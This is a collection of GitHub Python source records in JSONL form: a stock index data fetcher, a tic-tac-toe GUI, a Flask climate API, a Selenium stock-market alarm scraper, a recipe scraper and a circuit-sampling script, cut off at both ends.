unique=True, name='dt_index')\n\n\ndef _fix_data(df):\n code_col = '股票代码'\n # 去掉股票代码前缀 '\n df[code_col] = df[code_col].map(lambda x: x[1:])\n return df\n\n\ndef _one(code):\n db = get_db(db_name)\n collection = db[code]\n if collection.estimated_document_count() == 0:\n create_index(collection)\n start = find_last_date(collection) + pd.Timedelta(days=1)\n start = pd.Timestamp(start)\n start_str = start.strftime(r\"%Y-%m-%d\")\n df = retry_call(fetch_history,\n fkwargs={\n 'code': code,\n 'start': start,\n 'is_index': True\n },\n exceptions=(ConnectionError, ValueError),\n delay=0.3,\n logger=logger,\n tries=3)\n if df.empty:\n logger.info(f\"指数代码 {code} 开始日期 {start_str} 数据为空\")\n return\n df.reset_index(inplace=True)\n df = ensure_dtypes(df, **col_dtypes)\n fixed = _fix_data(df)\n fixed.drop(['股票代码'], axis=1, inplace=True)\n docs = to_dict(fixed)\n collection.insert_many(docs)\n logger.info(f\"指数代码 {code} 开始日期 {start_str} 插入 {len(docs)} 行\")\n\n\ndef refresh():\n t = time.time()\n # codes = MAIN_INDEX.keys()\n codes = get_index_base().to_dict()['name'].keys()\n for code in codes:\n try:\n _one(code)\n except Exception as e:\n print(f\"{e!r}\")\n logger.info(f\"指数数量 {len(codes)}, 用时 {time.time() - t:.4f}秒\")\n","repo_name":"liudengfeng/cnswd","sub_path":"cnswd/scripts/wy_index.py","file_name":"wy_index.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"} +{"seq_id":"9220469173","text":"from Tkinter import *\nimport tkMessageBox as mb\n\nroot = Tk(className=\"/Tic-Tac-Toe\")\n\nf = Frame(root)\n\nseeds = {}\nmoves = {}\n\nclick = True\n\ndef checker(event):\n global click\n s = ''\n if click == True:\n s = 'X'\n else:\n s = 'O'\n btn = event.widget\n if moves[seeds[btn]] == 'OK':\n click = not click\n moves[seeds[btn]] = s\n btn.config(text=moves[seeds[btn]])\n checkResult()\n\ndef checkResult():\n winner = ''\n if moves[0] == moves[1] == moves[2] != 'OK':\n winner = moves[0]\n elif moves[3] == moves[4] == moves[5] != 'OK':\n winner = moves[3]\n elif moves[5] == moves[6] == moves[7] != 'OK':\n winner = moves[5]\n elif moves[0] == moves[3] == moves[6] != 'OK':\n winner = moves[3]\n elif moves[1] == moves[4] == moves[7] != 'OK':\n winner = moves[1]\n elif moves[2] == moves[5] == moves[8] != 'OK':\n winner = moves[2]\n elif moves[0] == moves[4] == moves[8] != 'OK':\n winner = moves[0]\n elif moves[2] == moves[4] == moves[6] != 'OK':\n winner = moves[2]\n if winner != '':\n mb.showinfo('Winner', 'Player '+winner+' has won this match')\n\nfor i in range(9):\n btn = Button(f, text=\" \", font=('Times 26 bold'), height=2, width=4)\n seeds[btn]=i\n moves[i]='OK'\n btn.bind('', checker)\n btn.grid(row=i/3, column=i%3)\n\ndef reset():\n global click\n click = True\n for i in range(9):\n moves[i] = 'OK'\n for btn in seeds.keys():\n btn.config(text=' ')\n\nf.grid(row=0)\nresetBtn = Button(root, text=\"Reset\", font=('Times 21 bold'), height = 2, width = 4,command=reset)\nresetBtn.grid(row = 1)\n\n\nroot.mainloop()","repo_name":"FlarrowVerse/PythonCodes","sub_path":"TicTacToe/GUItk.py","file_name":"GUItk.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"16184222717","text":"import datetime as dt\nimport numpy as np\nimport pandas as pd\nimport json\n\n#My SQL Class I wrote\nfrom sqlHelper import SQLHelper\nfrom flask import Flask, jsonify\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\nsqlHelper = SQLHelper()\n\n@app.route(\"/api/v1.0/precipitation\")\ndef totalPrecipitation():\n data = sqlHelper.TotalPrecipitation()\n data = data.to_json(orient='records')\n data = json.loads(data)\n return(jsonify(data))\n\n@app.route(\"/api/v1.0/stations\")\ndef stations(): \n data = sqlHelper.TotalStations()\n return(jsonify(json.loads(data.to_json(orient='records')))) \n\n@app.route(\"/api/v1.0/tobs\")\ndef stations_temp(temperature): \n data = sqlHelper.activeTemp()\n return(jsonify(json.loads(data.to_json(orient='records')))) \n\n@app.route(\"/api/v1.0/temperature/\")\ndef get_temp_for_date(start): \n data = sqlHelper.getTempInfoForDate(start)\n return(jsonify(json.loads(data.to_json(orient='records')))) \n\n@app.route(\"/api/v1.0/temperature//\")\ndef get_temp_for_date_range(start, end): \n data = sqlHelper.getTempInfoForDateRange(start, end)\n return(jsonify(json.loads(data.to_json(orient='records')))) \n\n@app.route(\"/\")\ndef home():\n return (\n f\"Hawaii Climate Analysis!
\"\n\n f\"\"\"\n
\n \"\"\"\n )\n\n\n#################################################\n# Flask Run\n#################################################\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"poojanagrecha/SMU_homework","sub_path":"10- SQLAlchemy/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"22535318185","text":"import time\nfrom threading import Thread\n\nfrom colorama import Fore\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\n\nfrom model_alarm import BuyQueue, SaleQueue, HoghoghiBuySale, CapitaBuySale, GroupBuySale, session\n\n\nclass AlarmBorce:\n script1 = ''\n\n def __init__(self):\n options = Options()\n options.add_argument('--headless')\n self.driver = webdriver.Firefox(options=options)\n self._config(self.driver, 3)\n\n def _config(self, driver, n):\n market_watch_url = 'http://tsetmc.com/Loader.aspx?ParTree=15131F#'\n driver.get(market_watch_url)\n # choose make filter\n\n driver.find_element_by_xpath('//*[@id=\"SettingsDesc\"]/div[1]/a[7]').click()\n # click new filter\n driver.find_element_by_xpath('//*[@id=\"FilterIndex\"]/div[1]').click()\n # click filter 0\n driver.find_element_by_xpath('//*[@id=\"FilterIndex\"]/div[1]').click()\n # write filter\n filter1 = \"\"\"\n a=\"\";\n a+=(tmin)+\",\"+(tmax);\n (cfield0)=a;\n \n b=\"\";\n b=(ct).Sell_I_Volume+\",\"+(ct).Buy_I_Volume+\",\"+(ct).Buy_CountI+\",\"+(ct).Sell_CountI;\n (cfield1)=b;\n \n c=\"\";\n c=(ct).Sell_N_Volume+\",\"+(ct).Buy_N_Volume+\",\"+(ct).Buy_CountN+\",\"+(ct).Sell_CountN;\n (cfield2)=c;\n \"\"\"\n\n driver.find_element_by_xpath('//*[@id=\"InputFilterCode\"]').send_keys(filter1)\n # rename filter\n elm = driver.find_element_by_xpath('//*[@id=\"InputFilterName\"]')\n elm.clear()\n elm.send_keys('myFilter')\n\n # submit filter\n driver.find_element_by_xpath('//*[@id=\"FilterContent\"]/div[1]').click()\n\n # close filter box\n time.sleep(0.1)\n driver.find_element_by_css_selector('#ModalWindowOuter1 > div.popup_close').click()\n\n ## Display format ##\n driver.find_element_by_xpath('/html/body/div[6]/div[1]/a[5]').click()\n time.sleep(1)\n # make format\n\n driver.find_element_by_css_selector(\"div.SlideItem:nth-child(13)\").click()\n time.sleep(1)\n # title\n driver.find_element_by_xpath('//*[@id=\"Col0_Title\"]').send_keys('خرید فروش حقوقی')\n driver.find_element_by_xpath('//*[@id=\"Col1_Title\"]').send_keys('خرید حقیقی')\n driver.find_element_by_xpath('//*[@id=\"Col2_Title\"]').send_keys('تعداد خرید حقیقی')\n # Data\n driver.find_element_by_xpath('//*[@id=\"Col0_Data\"]').find_element_by_css_selector(\n '#Col0_Data > option:nth-child(25)').click()\n driver.find_element_by_xpath('//*[@id=\"Col1_Data\"]').find_element_by_css_selector(\n '#Col1_Data > option:nth-child(26)').click()\n driver.find_element_by_xpath('//*[@id=\"Col2_Data\"]').find_element_by_css_selector(\n '#Col2_Data > option:nth-child(27)').click()\n # save format\n driver.find_element_by_css_selector('.awesome').click()\n # change display\n driver.find_element_by_xpath('/html/body/div[6]/div[1]/a[5]').click()\n time.sleep(1)\n driver.find_element_by_css_selector('div.SlideItem:nth-child(5)').click()\n\n ## FILTER SETTING ##\n def setup(css_selector):\n driver.find_element_by_id('id1').click()\n time.sleep(0.1)\n driver.find_element_by_css_selector(css_selector).click()\n\n # farabours\n setup('div.awesome:nth-child(33)')\n # no industry group by\n setup('div.awesome:nth-child(17)')\n # no realstate right - tashilat maskan\n setup('div.awesome:nth-child(34)')\n # no bonds\n setup('div.awesome:nth-child(36)')\n # no options\n setup('div.awesome:nth-child(37)')\n # no Futures\n setup('div.awesome:nth-child(38)')\n # no kala\n setup('div.awesome:nth-child(40)')\n # no Futures\n setup('div.awesome:nth-child(44)')\n # simple show\n setup('div.awesome:nth-child(27)')\n\n # choose asasi metals\n # setup('#SectorList > option:nth-child(18)')\n\n try:\n driver.find_element_by_css_selector('.popup_close').click()\n except Exception as e:\n pass\n\n print(\"Ready to read...\")\n time.sleep(1)\n\n # yesterdayPrice: columns[5].innerHTML,\n # closePrice: columns[10].innerHTML,\n # closePercent: columns[12].innerText,\n # nm_qu_buy: columns[17].innerHTML,\n # hajm: columns[3].children[0].innerHTML,\n # price_qu_buy: columns[19].innerText,\n # nm_qu_sell: columns[22].innerText,\n # price_qu_sell: columns[20].innerText,\n\n self.script1 = \"\"\"\n function readFilter() {\n let result = document.getElementById('main').children;\n let data = {};\n for (let i=0; i < result.length; i++){\n let row = result[i];\n let columns = row.children;\n let tseId = columns[0].children[0].target;\n var c0 = columns[23].innerText.split(\",\");\n var c1 = columns[24].innerText.split(\",\");\n var c2 = columns[25].innerText.split(\",\");\n data[tseId] = {\n symbol: columns[0].innerText,\n link: columns[0].children[0].href,\n base_vol: columns[3].children[0].title,\n lastPrice: columns[7].innerHTML,\n lastPercent: columns[9].innerText,\n vol_qu_buy: columns[18].innerText,\n vol_qu_sell: columns[21].innerText,\n \n tmin: c0[0],\n tmax: c0[1],\n \n haghighiSellVol: c1[0],\n haghighiBuy: c1[1],\n haghighiBuyNum: c1[2],\n haghighiSellNum: c1[3],\n \n hoghoghiSellVol: c2[0],\n hoghighiBuyVol: c2[1],\n\n };\n }\n return data\n }\n return readFilter()\n \"\"\"\n\n # 1-1-آلارم صف خرید نزدیک به ریختن\n def _buy_queue(self, new_symbols, old_symbols):\n for symbol in new_symbols:\n try:\n list = []\n a = int(old_symbols[symbol]['vol_qu_buy'].replace(',', '')) # حجم اولین صف خرید\n a1 = int(new_symbols[symbol]['vol_qu_buy'].replace(',', '')) # حجم اولین صف خرید بعد ده ثانیه\n a3 = a - a1 # اختلاف حجم صف فروش در ده ثانیه\n\n m = new_symbols[symbol]['base_vol']\n m = int(m.split(':')[2].replace(',', '')) # حجم مبنا\n last_price = int(new_symbols[symbol]['lastPrice'].replace(',', ''))\n tmax = int(new_symbols[symbol]['tmax'].replace(',', ''))\n data = new_symbols[symbol]['symbol']\n link = new_symbols[symbol]['link']\n\n # # test3\n # BuyQueue(data, a1, a, link, time.strftime(\"%H:%M:%S\"), m).add()\n list.append([\n [a, 'حجم خرید قدیم'], [a1, 'حجم خرید جدید'], [m, 'حجم مبنا'], [tmax, 'بشترین قیمت مجاز'],\n [last_price, 'اخرین قیمت']]\n )\n if a3 > m * 50 / 100 and last_price == tmax:\n BuyQueue(data, a1, a, link, time.strftime(\"%H:%M:%S\"), str(list[0])).add()\n print(\n Fore.GREEN + f'{time.strftime(\"%H:%M:%S\")} {str(a1) + \" صف جدید\": >20}{str(a) + \" صف قدیم\" : >20} {\"[\" + data + \"]\":>10}')\n except:\n pass\n\n # 0-1-آلارم صف فروش نزدیک به ریختن\n def _sale_queue(self, new_symbols, old_symbols):\n for symbol in new_symbols:\n try:\n a = int(old_symbols[symbol]['vol_qu_sell'].replace(',', '')) # حجم اولین صف فروش\n a1 = int(new_symbols[symbol]['vol_qu_sell'].replace(',', '')) # حجم اولین صف فروش بعد ده ثانیه\n a3 = a - a1 # اختلاف حجم صف فروش در ده ثانیه\n\n m = new_symbols[symbol]['base_vol']\n m = int(m.split(':')[2].replace(',', '')) # حجم مبنا\n last_price = int(new_symbols[symbol]['lastPrice'].replace(',', ''))\n tmin = int(new_symbols[symbol]['tmin'].replace(',', ''))\n data = new_symbols[symbol]['symbol']\n link = new_symbols[symbol]['link']\n\n # # test3\n # SaleQueue(data, a1, a, link, time.strftime(\"%H:%M:%S\"), m).add()\n list = []\n list.append([\n [a, 'حجم فروش قدیم'], [a1, 'حجم فروش جدید'], [m, 'حجم مبنا'], [tmin, 'کمترین قیمت مجاز'],\n [last_price, 'اخرین قیمت']]\n )\n if a3 > m * 20 / 100 and last_price == tmin:\n SaleQueue(data, a1, a, link, time.strftime(\"%H:%M:%S\"), str(list[0])).add()\n print(\n Fore.RED + f' {time.strftime(\"%H:%M:%S\")}{str(a1) + \" صف جدید\": >20}{str(a) + \" صف قدیم\" : >20} {\"[\" + data + \"]\":>10}')\n\n except:\n pass\n\n # 3- آلارم خرید و فروش گروهی\n def _group_buy_sale(self, new_symbols, old_symbols):\n for symbol in new_symbols:\n try:\n bu1 = int(old_symbols[symbol]['haghighiBuy'].replace(',', '')) # حجم خرید حقیقی\n se1 = int(old_symbols[symbol]['haghighiSellVol'].replace(',', '')) # حجم فروش حقیقی\n\n nbu1 = int(old_symbols[symbol]['haghighiBuyNum'].replace(',', '')) # تعداد معاملات خرید حقیقی\n nse1 = int(old_symbols[symbol]['haghighiSellNum'].replace(',', '')) # تعداد معلاملات فروش حقیقی\n # بعد ده ثانیه\n bu2 = int(new_symbols[symbol]['haghighiBuy'].replace(',', '')) # حجم خرید حقیقی\n se2 = int(new_symbols[symbol]['haghighiSellVol'].replace(',', '')) # حجم فروش حقیقی\n\n nbu2 = int(new_symbols[symbol]['haghighiBuyNum'].replace(',', '')) # تعداد معاملات خرید حقیقی\n nse2 = int(new_symbols[symbol]['haghighiSellNum'].replace(',', '')) # تعداد معلاملات فروش حقیقی\n\n bu3 = max(0, bu1 - bu2)\n se3 = max(0, se1 - se2)\n\n nbu3 = max(0, nbu1 - nbu2)\n nse3 = max(0, nse1 - nse2)\n\n m = new_symbols[symbol]['base_vol']\n m = int(m.split(':')[2].replace(',', '')) # حجم مبنا\n lastPrice = new_symbols[symbol]['lastPrice'] # قیمت اخرین معامله\n lastPercent = new_symbols[symbol]['lastPercent'] # قیمت اخرین معامله\n link = new_symbols[symbol]['link']\n data = new_symbols[symbol]['symbol']\n price_and_percentage = f\"{lastPrice} ({lastPercent})\" # قیمت معامله و درصد\n # # test3\n # GroupBuySale(data, \"خرید\", nbu2, 1111, bu3, 1111, link, time.strftime(\n # \"%H:%M:%S\"), m).add()\n\n list = []\n list.append([\n [bu1, 'حجم خرید حقیقی قدیم'], [bu2, 'حجم خرید حقیقی جدید'], [m, 'حجم مبنا'],\n [se1, 'حجم فروش حقیقی قدیم'], [se2, 'حجم فروش حقیقی جدید'],\n [nbu1, 'تعداد خرید حقیقی قدیم'], [nbu2, 'تعداد خرید حقیقی جدید'],\n [nse1, 'تعداد فروش حقیقی قدیم'], [nse2, 'تعداد فروش حقیقی جدید'],\n ])\n try:\n each_haghighi_buy = bu3 / nbu2 * int(lastPrice.replace(',', '')) # هر کد حقیقی\n each_haghighi_sel = se3 / nse2 * int(lastPrice.replace(',', '')) # هر کد حقیقی\n if float(bu3 / nbu3) > m * 1 / 100:\n GroupBuySale(data, \"خرید\", nbu2, each_haghighi_buy, bu3, price_and_percentage, link,\n time.strftime(\n \"%H:%M:%S\"), str(list[0])).add()\n print(\n Fore.GREEN + f'{time.strftime(\"%H:%M:%S\") + \"زمان\"}{str(bu3 / nbu3) + \" میزان خرید هر خریدار\": >20} {str(nbu3) + \"تعداد خریدار\": >20}{str(bu3) + \" میزان خرید\" : >20}{\"[\" + data + \"]\":>10}')\n except:\n pass\n try:\n if float(se3 / nse3) > m * 1 / 100:\n GroupBuySale(data, \"فروش\", nse2, each_haghighi_sel, se3, price_and_percentage, link,\n time.strftime(\n \"%H:%M:%S\"), str(list[0])).add()\n print(\n Fore.RED + f'{time.strftime(\"%H:%M:%S\") + \"زمان\"}{str(se3 / nse3) + \" میزان فروش هر فروشنده\": >20} {str(nse3) + \" تعداد فروشنده\": >20}{str(se3) + \" میزان فروش\" : >20}{\"[\" + data + \"]\":>10}')\n except:\n pass\n\n except:\n pass\n\n # 2- آلارم تغییر سرانه قدرت خریدار و فروشنده\n def _capita_buy_sale(self, new_symbols, old_symbols):\n for symbol in new_symbols:\n try:\n bu1 = int(old_symbols[symbol]['haghighiBuy'].replace(',', '')) # حجم خرید حقیقی\n nbu1 = int(old_symbols[symbol]['haghighiBuyNum'].replace(',', '')) # تعداد معاملات خرید حقیقی\n se1 = int(old_symbols[symbol]['haghighiSellVol'].replace(',', '')) # حجم فروش حقیقی\n nse1 = int(old_symbols[symbol]['haghighiSellNum'].replace(',', '')) # تعداد معاملات فروش حقیقی\n\n bu2 = int(new_symbols[symbol]['haghighiBuy'].replace(',', '')) # حجم خرید حقیقی\n nbu2 = int(new_symbols[symbol]['haghighiBuyNum'].replace(',', '')) # تعداد معاملات خرید حقیقی\n se2 = int(new_symbols[symbol]['haghighiSellVol'].replace(',', '')) # حجم فروش حقیقی\n nse2 = int(new_symbols[symbol]['haghighiSellNum'].replace(',', '')) # تعداد معاملات فروش حقیقی\n\n data = new_symbols[symbol]['symbol']\n lastPrice = new_symbols[symbol]['lastPrice'] # قیمت اخرین معامله\n lastPercent = new_symbols[symbol]['lastPercent'] # قیمت اخرین معامله\n link = new_symbols[symbol]['link']\n # # test3\n # CapitaBuySale(data, \"خرید\", 111, 1111, 111, 111,\n # 111, f\"{lastPrice} ({lastPercent})\", link,\n # time.strftime(\"%H:%M:%S\")).add()\n list = []\n list.append([\n [bu1, 'حجم خرید حقیقی قدیم'], [bu2, 'حجم خرید حقیقی جدید'],\n [se1, 'حجم فروش حقیقی قدیم'], [se2, 'حجم فروش حقیقی جدید'],\n [nbu1, 'تعداد خرید حقیقی قدیم'], [nbu2, 'تعداد خرید حقیقی جدید'],\n [nse1, 'تعداد فروش حقیقی قدیم'], [nse2, 'تعداد فروش حقیقی جدید'],\n ])\n # percentage_change_buy_sale = ((bu2 / nbu2) / (se2 / nse2))\n percentage_change_buy_sale = 0\n if ((bu2 / nbu2) / (se2 / nse2)) > 2 * ((bu1 / nbu1) / (se1 / nse1)):\n CapitaBuySale(data, \"خرید\", round(bu1 / nbu1, 2), round(se1 / nse1, 2), round(bu2 / nbu2, 2),\n round(se2 / nse2, 2),\n round(percentage_change_buy_sale, 2), f\"{lastPrice} ({lastPercent})\", link,\n time.strftime(\"%H:%M:%S\"), str(list[0])).add()\n print(\n Fore.GREEN + f'{time.strftime(\"%H:%M:%S\")}{str(round(se1 / nse1)) + \" سرانه فروش قدیم\":>20}{str(round(bu1 / nbu1)) + \" سرانه خرید قدیم\":>20}{str(round(se2 / nse2)) + \" سرانه فروش جدید\":>20}{str(round(bu2 / nbu2)) + \" سرانه خرید جدید\" : >20}{\" سرانه خریدار : وضعیت \":>20}{\"[\" + data + \"]\":>10}')\n\n if ((se2 / nse2) / (bu2 / nbu2)) > 2 * ((se1 / nse1) / (bu1 / nbu1)):\n CapitaBuySale(data, \"فروش\", round(bu1 / nbu1, 2), round(se1 / nse1, 2), round(bu2 / nbu2, 2),\n round(se2 / nse2, 2),\n round(percentage_change_buy_sale, 2), f\"{lastPrice} ({lastPercent})\", link,\n time.strftime(\"%H:%M:%S\"), str(list[0])).add()\n print(\n Fore.RED + f'{time.strftime(\"%H:%M:%S\")}{str(round(se1 / nse1)) + \" سرانه فروش قدیم\":>20}{str(round(bu1 / nbu1)) + \" سرانه خرید قدیم\":>20}{str(round(se2 / nse2)) + \" سرانه فروش جدید\":>20}{str(round(bu2 / nbu2)) + \" سرانه خرید جدید\" : >20}{\"سرانه فروشند : وضعیت\":>20}{\"[\" + data + \"]\":>10}')\n except:\n pass\n\n # 4- آلارم خرید و فروش سنگین حقوقی\n def _hoghoghi_buy_sale(self, new_symbols, old_symbols):\n for symbol in new_symbols:\n try:\n bu1 = int(old_symbols[symbol]['hoghighiBuyVol'].replace(',', '')) # حجم خرید حقوقی\n se1 = int(old_symbols[symbol]['hoghoghiSellVol'].replace(',', '')) # حجم فروش حقوقی\n\n bu2 = int(new_symbols[symbol]['hoghighiBuyVol'].replace(',', '')) # حجم خرید حقوقی\n se2 = int(new_symbols[symbol]['hoghoghiSellVol'].replace(',', '')) # حجم فروش حقوقی\n\n se3 = se1 - se2\n bu3 = bu1 - bu2\n\n lastPrice = new_symbols[symbol]['lastPrice'] # قیمت اخرین معامله\n lastPercent = new_symbols[symbol]['lastPercent'] # قیمت اخرین معامله\n data = new_symbols[symbol]['symbol']\n link = new_symbols[symbol]['link']\n m = new_symbols[symbol]['base_vol']\n m = int(m.split(':')[2].replace(',', '')) # حجم مبنا # حجم مبنا\n list = []\n list.append([\n [bu1, ' حجم خرید حقوقی قدیم'], [bu2, ' حجم خرید حقوقی جدید'], [m, \"ججم مبنا\"],\n [se1, 'حجم فروش حقوقی قدیم'], [se2, 'حجم فروش حقوقی جدید'],\n\n ])\n if bu3 > (m * 1 / 10):\n HoghoghiBuySale(data, \"خرید\", bu3, f\"{lastPrice} ({lastPercent})\", link,\n time.strftime(\"%H:%M:%S\"), str(list[0])).add()\n\n print(\n Fore.GREEN + f'{time.strftime(\"%H:%M:%S\")} {str(bu3) + \" حجم خرید حقوقی\":>10}{\"[\" + data + \"]\":>10}')\n\n if se3 > (m * 1 / 10): # (m * 1 / 10)\n HoghoghiBuySale(data, \"فروش\", se3, f\"{lastPrice} ({lastPercent})\", link,\n time.strftime(\"%H:%M:%S\"), str(list[0])).add()\n print(\n Fore.RED + f'{time.strftime(\"%H:%M:%S\")} {str(se3) + \" حجم فروش حقوقی\":>10}{\"[\" + data + \"]\":>10}')\n except:\n pass\n\n def _clean_table(self):\n session.query(SaleQueue).delete()\n session.query(BuyQueue).delete()\n session.query(CapitaBuySale).delete()\n session.query(HoghoghiBuySale).delete()\n session.query(GroupBuySale).delete()\n session.commit()\n\n def main(self):\n time_queue = 0\n i = 0\n t_e = 12 * 3600 + 30 * 60\n t_s = 9 * 3600\n t_n = time.localtime().tm_hour * 3600 + time.localtime().tm_min * 60 + time.localtime().tm_sec\n while t_s < t_n and t_e > t_n:\n all = time.time()\n div1 = self.driver.execute_script(self.script1)\n sc = time.time() - all\n new_symbols = div1\n if i == 0:\n old_symbols = new_symbols\n old_symbols_q = new_symbols\n pro = time.time()\n\n try:\n print(Fore.WHITE + \"-------------group_buy_sale--------------------\")\n self._group_buy_sale(new_symbols, old_symbols)\n print(Fore.WHITE + \"-------------capita_buy_sale--------------------\")\n self._capita_buy_sale(new_symbols, old_symbols)\n print(Fore.WHITE + \"-------------hoghoghi_buy_sale--------------------\")\n self._hoghoghi_buy_sale(new_symbols, old_symbols)\n if time_queue == 10:\n print(Fore.WHITE + \"-------------sale_queue--------------------\")\n self._sale_queue(new_symbols, old_symbols_q)\n print(Fore.WHITE + \"-------------buy_queue--------------------\")\n self._buy_queue(new_symbols, old_symbols_q)\n time_queue = 0\n old_symbols_q = new_symbols\n\n except Exception as e:\n print(Fore.RED + f\"----------error-{e}--------------\")\n\n\n session.commit()\n tpro = time.time() - pro\n time.sleep(max(0, 1 - (time.time() - all)))\n time_queue += 1\n t_n = time.localtime().tm_hour * 3600 + time.localtime().tm_min * 60 + time.localtime().tm_sec\n i += 1\n old_symbols = new_symbols\n print(Fore.CYAN + f\"== all {time.time() - all} ==sc {sc} ==pro {tpro}========\")\n\n print(\"Close market !\")\n # claen database\n if 0 < t_n and 180 > t_n:\n self._clean_table()\n print(\"Clean to database...\")\n\n\n def run(self):\n def min():\n while True:\n self.main()\n time.sleep(60)\n\n Thread(target=min, args=()).start()\n\n\n# a = AlarmBorce()\n# a.run()\n","repo_name":"navaiy/robo","sub_path":"seleniu.py","file_name":"seleniu.py","file_ext":"py","file_size_in_byte":23115,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"3220292264","text":"import sys\nsys.stdin = open('BOJ#1799_Bishop.txt')\n\ndcol = [-1, 1, 1, -1]\ndrow = [1, 1, -1, -1]\n\n\nN = int(input())\nchess = [list(map(int, input().split())) for _ in range(N)]\nfor col in range(N):\n for row in range(N):\n if chess[col][row] == 1:\n dfs(col, row)","repo_name":"gmkim716/Study","sub_path":"Solving/BOJ#1799_Bishop.py","file_name":"BOJ#1799_Bishop.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"7535598342","text":"from bs4 import BeautifulSoup\n\nimport requests\n\n# strip function\n\n\ndef stripdata(data):\n data = data.string\n data = data.strip()\n return data\n\n\nRecipeUrl = 'https://www.allrecipes.com/recipe/269096/naturally-sweetened-cranberry-sauce/'\n\n\nallrecipes = requests.get(RecipeUrl)\n\nsoup = BeautifulSoup(allrecipes.text, 'lxml')\n\ntittle = soup.h1.string\n\nURL = RecipeUrl\n\n# Time\n\nTimePrep = soup.find_all(class_=\"recipe-meta-item-body\")[0]\nTimeCook = soup.find_all(class_=\"recipe-meta-item-body\")[1]\nTimeTotal = soup.find_all(class_=\"recipe-meta-item-body\")[2]\n\n\nTimePrep = stripdata(TimePrep)\nTimeCook = stripdata(TimeCook)\nTimeTotal = stripdata(TimeTotal)\n\n# Servings and Amount per recipe\n\nServings = soup.find_all(class_=\"recipe-meta-item-body\")[3]\n\nServings = stripdata(Servings)\n\ningredient1 = soup.find_all(class_=\"ingredients-item-name\")[0]\nlenght = soup.find_all(class_=\"ingredients-item-name\")\n\n\ningredient1 = stripdata(ingredient1)\n# Ingredients\n\ni = 0\nfor i in lenght:\n stripdata(i)\n print(stripdata(i))\n\n\nprint(URL)\nprint\nprint(tittle)\nprint\nprint(TimePrep)\nprint\nprint(TimeCook)\nprint\nprint(TimeTotal)\nprint\nprint(Servings)\nprint\nprint(ingredient1)\n\n\n# URL -DONE\n# Tittle\n# Recipe details (prep,time, etc)\n# ---Prep\n# ---Cook\n# ---Total\n# ---Servings\n# ---Yeld\n# INGREDIENTS (get lenght and after each other separated) check if is vegan or vegetarian\n# Directions (get lenght and after each other separated)\n","repo_name":"BhomBogdan/MasterRecipesAPI","sub_path":"TESTBeautiful.py","file_name":"TESTBeautiful.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"28821966637","text":"import _thread\nimport threading\nimport multiprocessing\nimport os\nimport time\nimport sys\nimport math\nimport random\nfrom ucts import uct\nfrom ucts import TopoPlanner\nfrom ucts.GetReward import *\nimport datetime\n\nimport numpy as np\nfrom utils.util import mkdir, get_sim_configs, save_reward_hash, get_steps_traj, read_approve_path, \\\n read_joint_component_prob\nfrom SimulatorAnalysis import UCT_data_collection\n\nimport gc\nimport datetime\nfrom SimulatorAnalysis.UCT_data_collection import *\n\n\ndef data_dict_to_list(data_json_file):\n data_list = []\n for k, v in data_json_file.items():\n data_list.append([k, v])\n return data_list\n\n\ndef random_sampling(traj, test_number, configs, date_str, target_vout_min=-500, target_vout_max=500):\n path = './SimulatorAnalysis/database/analytic-expression.json'\n out_file_name = \"Results/mutitest_\" + str(configs['target_vout']) + \"-\" + date_str + \"-\" + str(os.getpid()) + \".txt\"\n figure_folder = \"figures/\" + date_str + \"/\"\n mkdir(figure_folder)\n\n start_time = datetime.datetime.now()\n good_result_num = 0\n fo = open(out_file_name, \"w\")\n fo.write(\"max_depth,num_runs,avg_step\\n\")\n avg_step_list = []\n results = []\n keys = []\n data_json_file = json.load(open(\"./SimulatorAnalysis/database/data.json\"))\n # for k, v in data_json_file.items():\n # if v['key'] not in keys:\n # print(v['key'])\n # keys.append(v['key'])\n # print('number of keys:', len(keys))\n data_list = data_dict_to_list(data_json_file)\n # for i in data_list:\n # print(i)\n # print(len(data_list))\n # return\n expression_json_file = json.load(open(\"./SimulatorAnalysis/database/expression.json\"))\n print('number of expression:', len(expression_json_file))\n print('number of data:', len(data_list))\n key_json_file = json.load(open(\"./SimulatorAnalysis/database/key.json\"))\n print(len(key_json_file))\n # return\n simu_results = []\n with open(\"./SimulatorAnalysis/database/analytic.csv\", \"r\") as csv_file:\n csv_reader = csv.reader(csv_file)\n for row in csv_reader:\n simu_results.append(row)\n\n for _ in range(test_number):\n query_number = 0\n hash_number = 0\n max_reward = -1\n max_result = None\n key_expression = {}\n searched_data = {}\n total_data_len = len(data_list)\n print(total_data_len)\n while query_number < traj:\n # for i in range(0, len(data_list)):\n sample_data = random.choice(data_list)\n # sample_data = data_list[i]\n data_fn = sample_data[0]\n str_list_of_node = str(sample_data[1]['list_of_node'])\n str_list_of_edge = str(sample_data[1]['list_of_edge'])\n str_net_list = str(sample_data[1]['netlist'])\n data_graph = (str_list_of_node, str_list_of_edge, str_net_list)\n if data_graph in searched_data:\n hash_number += 1\n continue\n query_number += 1\n searched_data[data_graph] = query_number\n\n if sample_data[0] not in expression_json_file:\n expression = \"Invalid\"\n duty_cycle_para = \"None\"\n reward = 0\n tmp_para = duty_cycle_para\n tmp_result = {'Expression': expression, 'efficiency': 0, 'output_voltage': target_vout_min}\n if data_json_file[data_fn]['key'] + '$' + duty_cycle_para not in key_expression:\n key_expression[data_json_file[data_fn]['key'] + '$' + duty_cycle_para] = \\\n {'Expression': expression, 'efficiency': 0, 'output_voltage': target_vout_min}\n else:\n expression = expression_json_file[data_fn]\n for i in range(len(simu_results)):\n if simu_results[i][0] == data_fn:\n print(simu_results[i])\n reward = -1\n while i < (len(simu_results)) and simu_results[i][0] == data_fn:\n duty_cycle_para = float(simu_results[i][1])\n if 